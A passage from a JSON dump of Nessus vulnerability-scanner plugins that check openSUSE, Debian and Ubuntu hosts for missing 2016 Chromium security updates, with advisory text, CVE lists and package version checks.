CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits, fuzzing and other initiatives", "cvss3": {}, "published": "2016-07-26T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2016-900)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium-desktop-kde", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-900.NASL", "href": "https://www.tenable.com/plugins/nessus/92550", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-900.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92550);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2016-900)\");\n script_summary(english:\"Check for the openSUSE-2016-900 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chromium was updated to 52.0.2743.82 to fix the following security\nissues (boo#989901) :\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service\n Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits,\n fuzzing and other initiatives\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=989901\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", 
ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"chromedriver-52.0.2743.82-61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"chromium-52.0.2743.82-61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"chromium-desktop-gnome-52.0.2743.82-61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"chromium-desktop-kde-52.0.2743.82-61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"chromium-ffmpegsumo-52.0.2743.82-61.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromium / chromium-desktop-gnome / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:17", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2016-1704 The chrome development team found and fixed various issues during internal auditing.\n\n - CVE-2016-1705 The chrome development team found and fixed various issues during internal auditing.\n\n - CVE-2016-1706 Pinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\n - CVE-2016-1707 xisigr discovered a URL spoofing issue.\n\n - CVE-2016-1708 Adam Varsan discovered a use-after-free issue.\n\n - CVE-2016-1709 ChenQin discovered a buffer overflow issue in the sfntly library.\n\n - CVE-2016-1710 Mariusz Mlynski discovered a same-origin bypass.\n\n - CVE-2016-1711 Mariusz Mlynski discovered another same-origin bypass.\n\n - CVE-2016-5127 cloudfuzzer discovered a use-after-free issue.\n\n - CVE-2016-5128 A same-origin bypass issue was discovered in the v8 JavaScript library.\n\n - CVE-2016-5129 Jeonghoon Shin discovered a memory corruption issue in the v8 JavaScript library.\n\n - CVE-2016-5130 Widih Matar discovered a URL spoofing 
issue.\n\n - CVE-2016-5131 Nick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\n - CVE-2016-5132 Ben Kelly discovered a same-origin bypass.\n\n - CVE-2016-5133 Patch Eudor discovered an issue in proxy authentication.\n\n - CVE-2016-5134 Paul Stone discovered an information leak in the Proxy Auto-Config feature.\n\n - CVE-2016-5135 ShenYeYinJiu discovered a way to bypass the Content Security Policy.\n\n - CVE-2016-5136 Rob Wu discovered a use-after-free issue.\n\n - CVE-2016-5137 Xiaoyin Liu discovered a way to discover whether an HSTS website had been visited.", "cvss3": {}, "published": "2016-08-02T00:00:00", "type": "nessus", "title": "Debian DSA-3637-1 : chromium-browser - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1704", "CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium-browser", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3637.NASL", "href": "https://www.tenable.com/plugins/nessus/92666", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3637. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92666);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1704\", \"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_xref(name:\"DSA\", value:\"3637\");\n\n script_name(english:\"Debian DSA-3637-1 : chromium-browser - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2016-1704\n The chrome development team found and fixed various\n issues during internal auditing.\n\n - CVE-2016-1705\n The chrome development team found and fixed various\n issues during internal auditing.\n\n - CVE-2016-1706\n Pinkie Pie discovered a way to escape the Pepper Plugin\n API sandbox.\n\n - CVE-2016-1707\n xisigr discovered a URL spoofing issue.\n\n - CVE-2016-1708\n Adam Varsan discovered a use-after-free issue.\n\n - CVE-2016-1709\n ChenQin discovered a buffer overflow issue in the sfntly\n library.\n\n - CVE-2016-1710\n Mariusz Mlynski discovered a same-origin bypass.\n\n - CVE-2016-1711\n Mariusz Mlynski discovered another same-origin bypass.\n\n - CVE-2016-5127\n cloudfuzzer discovered a use-after-free issue.\n\n - CVE-2016-5128\n A same-origin bypass issue was discovered in the v8\n JavaScript 
library.\n\n - CVE-2016-5129\n Jeonghoon Shin discovered a memory corruption issue in\n the v8 JavaScript library.\n\n - CVE-2016-5130\n Widih Matar discovered a URL spoofing issue.\n\n - CVE-2016-5131\n Nick Wellnhofer discovered a use-after-free issue in the\n libxml2 library.\n\n - CVE-2016-5132\n Ben Kelly discovered a same-origin bypass.\n\n - CVE-2016-5133\n Patch Eudor discovered an issue in proxy authentication.\n\n - CVE-2016-5134\n Paul Stone discovered an information leak in the Proxy\n Auto-Config feature.\n\n - CVE-2016-5135\n ShenYeYinJiu discovered a way to bypass the Content\n Security Policy.\n\n - CVE-2016-5136\n Rob Wu discovered a use-after-free issue.\n\n - CVE-2016-5137\n Xiaoyin Liu discovered a way to discover whether an HSTS\n website had been visited.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1704\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1706\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1707\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1708\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2016-5128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5129\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5131\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5132\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5133\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5135\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5136\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5137\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/chromium-browser\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3637\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium-browser packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 52.0.2743.82-1~deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No 
known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"chromedriver\", reference:\"52.0.2743.82-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium\", reference:\"52.0.2743.82-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-dbg\", reference:\"52.0.2743.82-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-inspector\", reference:\"52.0.2743.82-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-l10n\", reference:\"52.0.2743.82-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) 
security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:19", "description": "Multiple security issues were discovered in Chromium. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to read uninitialized memory, cause a denial of service (application crash) or execute arbitrary code.\n(CVE-2016-1705)\n\nIt was discovered that the PPAPI implementation does not validate the origin of IPC messages to the plugin broker process. A remote attacker could potentially exploit this to bypass sandbox protection mechanisms. (CVE-2016-1706)\n\nIt was discovered that Blink does not prevent window creation by a deferred frame. A remote attacker could potentially exploit this to bypass same origin restrictions. (CVE-2016-1710)\n\nIt was discovered that Blink does not disable frame navigation during a detach operation on a DocumentLoader object. A remote attacker could potentially exploit this to bypass same origin restrictions.\n(CVE-2016-1711)\n\nA use-after-free was discovered in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer process crash, or execute arbitrary code. (CVE-2016-5127)\n\nIt was discovered that objects.cc in V8 does not prevent API interceptors from modifying a store target without setting a property.\nA remote attacker could potentially exploit this to bypass same origin restrictions. (CVE-2016-5128)\n\nA memory corruption was discovered in V8. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer process crash, or execute arbitrary code. (CVE-2016-5129)\n\nA security issue was discovered in Chromium. 
A remote attacker could potentially exploit this to spoof the currently displayed URL.\n(CVE-2016-5130)\n\nA use-after-free was discovered in libxml. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer process crash, or execute arbitrary code. (CVE-2016-5131)\n\nThe Service Workers implementation in Chromium does not properly implement the Secure Contexts specification during decisions about whether to control a subframe. A remote attacker could potentially exploit this to bypass same origin restrictions. (CVE-2016-5132)\n\nIt was discovered that Chromium mishandles origin information during proxy authentication. A man-in-the-middle attacker could potentially exploit this to spoof a proxy authentication login prompt.\n(CVE-2016-5133)\n\nIt was discovered that the Proxy Auto-Config (PAC) feature in Chromium does not ensure that URL information is restricted to a scheme, host and port. A remote attacker could potentially exploit this to obtain sensitive information. (CVE-2016-5134)\n\nIt was discovered that Blink does not consider referrer-policy information inside an HTML document during a preload request. A remote attacker could potentially exploit this to bypass Content Security Policy (CSP) protections. (CVE-2016-5135)\n\nIt was discovered that the Content Security Policy (CSP) implementation in Blink does not apply http :80 policies to https :443 URLs. A remote attacker could potentially exploit this to determine whether a specific HSTS website has been visited by reading a CSP report. (CVE-2016-5137).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-08-08T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS : oxide-qt vulnerabilities (USN-3041-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5137"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-3041-1.NASL", "href": "https://www.tenable.com/plugins/nessus/92784", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3041-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92784);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5137\");\n script_xref(name:\"USN\", value:\"3041-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS : oxide-qt vulnerabilities (USN-3041-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Multiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service (application crash) or execute arbitrary code.\n(CVE-2016-1705)\n\nIt was discovered that the PPAPI implementation does not validate the\norigin of IPC messages to the plugin broker process. A remote attacker\ncould potentially exploit this to bypass sandbox protection\nmechanisms. (CVE-2016-1706)\n\nIt was discovered that Blink does not prevent window creation by a\ndeferred frame. A remote attacker could potentially exploit this to\nbypass same origin restrictions. (CVE-2016-1710)\n\nIt was discovered that Blink does not disable frame navigation during\na detach operation on a DocumentLoader object. A remote attacker could\npotentially exploit this to bypass same origin restrictions.\n(CVE-2016-1711)\n\nA use-after-free was discovered in Blink. 
If a user were tricked in to\nopening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer process crash,\nor execute arbitrary code. (CVE-2016-5127)\n\nIt was discovered that objects.cc in V8 does not prevent API\ninterceptors from modifying a store target without setting a property.\nA remote attacker could potentially exploit this to bypass same origin\nrestrictions. (CVE-2016-5128)\n\nA memory corruption was discovered in V8. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer process crash,\nor execute arbitrary code. (CVE-2016-5129)\n\nA security issue was discovered in Chromium. A remote attacker could\npotentially exploit this to spoof the currently displayed URL.\n(CVE-2016-5130)\n\nA use-after-free was discovered in libxml. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer process crash,\nor execute arbitrary code. (CVE-2016-5131)\n\nThe Service Workers implementation in Chromium does not properly\nimplement the Secure Contexts specification during decisions about\nwhether to control a subframe. A remote attacker could potentially\nexploit this to bypass same origin restrictions. (CVE-2016-5132)\n\nIt was discovered that Chromium mishandles origin information during\nproxy authentication. A man-in-the-middle attacker could potentially\nexploit this to spoof a proxy authentication login prompt.\n(CVE-2016-5133)\n\nIt was discovered that the Proxy Auto-Config (PAC) feature in Chromium\ndoes not ensure that URL information is restricted to a scheme, host\nand port. A remote attacker could potentially exploit this to obtain\nsensitive information. (CVE-2016-5134)\n\nIt was discovered that Blink does not consider referrer-policy\ninformation inside an HTML document during a preload request. 
A remote\nattacker could potentially exploit this to bypass Content Security\nPolicy (CSP) protections. (CVE-2016-5135)\n\nIt was discovered that the Content Security Policy (CSP)\nimplementation in Blink does not apply http :80 policies to https :443\nURLs. A remote attacker could potentially exploit this to determine\nwhether a specific HSTS website has been visited by reading a CSP\nreport. (CVE-2016-5137).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3041-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected liboxideqtcore0 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/08\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.16.5-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.16.5-0ubuntu0.16.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"liboxideqtcore0\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:08", "description": "CVE-2016-4658 Namespace nodes must be copied to avoid use-after-free errors. 
